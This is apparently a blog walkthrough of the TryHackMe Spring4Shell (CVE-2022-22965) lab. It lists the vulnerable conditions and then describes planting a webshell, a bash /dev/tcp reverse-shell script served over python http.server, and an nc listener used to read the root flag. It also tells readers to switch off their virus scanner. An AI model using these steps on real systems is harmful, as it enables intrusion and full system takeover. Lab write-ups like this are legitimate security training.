The Dutch Hacker
pring4shell tryhackme

Spring4Shell: CVE-2022-22965 on Tryhackme

This is the write up for the Room Spring4Shell on Tryhackme

Make connection with VPN or use the attack box on Tryhackme site to connect to the Tryhackme lab environment


Fortunately, despite how commonly used the Spring Framework is, the conditions in which the vulnerability can be exploited are actually fairly limited.

The Spring4Shell vulnerability affects Spring Core before version 5.2, as well as in versions 5.3.0-17 and 5.2.0-19, running on a version of the Java Development Kit (JDK) greater than or equal to 9. The publicly available exploits currently available only work on applications deployed to Apache Tomcat as WARs; however, the Spring Framework maintainers have stated that they believe there may be other ways to exploit the vulnerability.

Current conditions for vulnerability (as stated in Spring’s announcement of the vulnerability) can be summarised as follows:

  • JDK 9+
  • A vulnerable version of the Spring Framework (<5.2 | 5.2.0-19 | 5.3.0-17)
  • Apache Tomcat as a server for the Spring application, packaged as a WAR
  • A dependency on the spring-webmvc and/or spring-webflux components of the Spring Framework

It is worth noting, however, that these may change over time as other ways to exploit the vulnerability are discovered.

Tasks Spring4Shell

Task 1

Start the machine attached to this task and press complete

Task 2

Read all that is in this task and press complete

Task 3

Download the attached file and unzip it. If you download it with Windows then make sure your virus scanner is off as it will detect it and delete the file. Use the password provided in the task to unzip it

Look at the source website and notice a post request on the website

source spring4shell

This website is vulnerable and we can now attack by typing in the following code ( Change ip address to your vulnerable machine)


It uploaded the webshell.

spring4shell tryhackme

You can now enter commands after the cmd=

3.1 [Bonus Question: Optional]
 Use your webshell to obtain a reverse/bind shell on the target.

Create a script with the following content and call it


bash -i >& /dev/tcp/<YOUR MACHINE IP>/443 0>&1
chmod 777
start a webserver with python
python3 -m http.server 80

Now that we have the script ready we need to upload it to the server

spring4shell tryhackme

Put this after the cmd=


Open a listener on you machine by typing

nc -nlvp 443

Now execute the script on the server by putting this after the cmd=


3.2 What is the flag in /root/flag.txt?

Now that you have a reverse shell you can type in cat /root/flag.txt to get the flag

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us